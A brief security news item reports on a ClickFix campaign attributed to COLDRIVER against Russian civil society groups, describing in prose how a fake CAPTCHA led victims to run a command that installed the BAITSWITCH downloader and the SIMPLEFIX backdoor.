Zscaler ThreatLabz has uncovered a new multi-stage ClickFix campaign potentially targeting Russian civil society groups, NGOs, and think tanks. The operation is believed to be the work of the Russia-linked advanced persistent threat (APT) group COLDRIVER, also known as Star Blizzard, Callisto, and UNC4057.
The multi-stage approach represents an evolution in Coldrivers's tactics, which previously relied mostly on credential phishing. The ClickFix technique deceives victims into executing malicious commands via the Windows Run dialog box.
The infection chain begins with a deceiving webpage purporting to offer information for Russian civil society members. When a user interacts with a fake Cloudflare Turnstile checkbox on the site, malicious JavaScript silently copies a command to the user’s clipboard. The page then presents prompts encouraging the user to paste and execute the command manually, which helps to bypass automated defenses.
Upon execution, the command drops BAITSWITCH, a lightweight downloader (Machinerie.dll), which establishes persistence on the target system and fetches stager payloads. The payloads deploy SIMPLEFIX, a PowerShell-based backdoor, granting the attackers remote access.
ThreatLabz attributes this campaign to Coldriver with moderate confidence, based on code similarities, target profiles, and overlaps in tactics, techniques, and procedures (TTPs). The group is known for targeting journalists, human rights defenders, and dissidents both in Russia and abroad.